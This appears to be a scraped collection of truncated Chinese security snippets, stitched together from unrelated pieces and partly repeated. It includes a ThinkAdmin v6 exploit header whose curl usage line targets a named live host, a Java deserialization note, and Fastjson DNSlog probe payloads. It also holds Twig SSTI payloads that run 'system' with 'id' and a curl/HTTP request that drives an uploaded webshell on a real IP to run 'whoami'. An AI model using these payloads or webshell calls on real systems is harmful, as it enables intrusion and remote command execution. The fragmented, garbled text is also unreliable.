定位: 是一个反序列化的入口,只需一个 gaget就能 RCE
影响版本: 和 jdk( jdk7u21) jython () 以及底层库(CommonsCollections) 还有补丁级别有关。并且存在其他 gadget利用的可能。
<?php | |
/* | |
* | |
* Date: 2020-02-06 | |
* Exploit Author: k4ii | |
* Daemon Link: https://v6.thinkadmin.top | |
* Version: v6 | |
* Tested on: linux | |
* Usage: |
<?php | |
/* | |
* Date: 2020-02-06 | |
* Exploit Author: k4ii | |
* Daemon Link: https://v6.thinkadmin.top | |
* Version: v6 | |
* Tested on: linux | |
* Usage: | |
* curl "https://v6.thinkadmin.top/admin/api.update/get" -d "encode=`php poc.php`" | |
# web 1 | |
一个简单的漏洞利用题,知道 ctfd的账号接管的洞就能做。 | |
# web 2 | |
伪代码如下 | |
``` | |
open("flag.txt","r") | |
def shell(): | |
os.system("rm flag.txt") |
package main | |
import ( | |
"fmt" | |
"io" | |
"io/ioutil" | |
"net" | |
"os" | |
) |
定位: 是一个反序列化的入口,只需一个 gaget就能 RCE
影响版本: 和 jdk( jdk7u21) jython () 以及底层库(CommonsCollections) 还有补丁级别有关。并且存在其他 gadget利用的可能。
有三个面试机会。 | |
奇安信,陌陌安全,腾讯。 | |
奇安信: | |
大概是按照渗透的流程开始问的。 |
{"@type":"java.net.Inet4Address","val":"dnslog"} | |
{"@type":"java.net.Inet6Address","val":"dnslog"} | |
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}} | |
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""} | |
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"} | |
Set[{"@type":"java.net.URL","val":"dnslog"}] | |
Set[{"@type":"java.net.URL","val":"dnslog"} | |
{{"@type":"java.net.URL","val":"dnslog"}:0 |
PHP: | |
readfile("phar:///1.png/test.txt") == readfile("phaR:///1.png/test.txt") | |
TWIG SSTI: | |
{{["id"]|map("system")|join(",") | |
{{["id", 0]|sort("system")|join(",")}} | |
{{["id"]|filter("system")|join(",")}} | |
{{[0, 0]|reduce("system", "id")|join(",")}} |
<?php | |
/* | |
* | |
* | |
* 试图绕过 ast的分析 | |
* 反序列化传递参数 | |
* 注册全局变量绕过 | |
* php://input |
curl http://47.113.219.76/uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php --data "_=var_dump&__=system&___=whoami" | |
POST /uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php HTTP/1.1 | |
Host: 47.113.219.76 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | |
Accept-Encoding: gzip, deflate |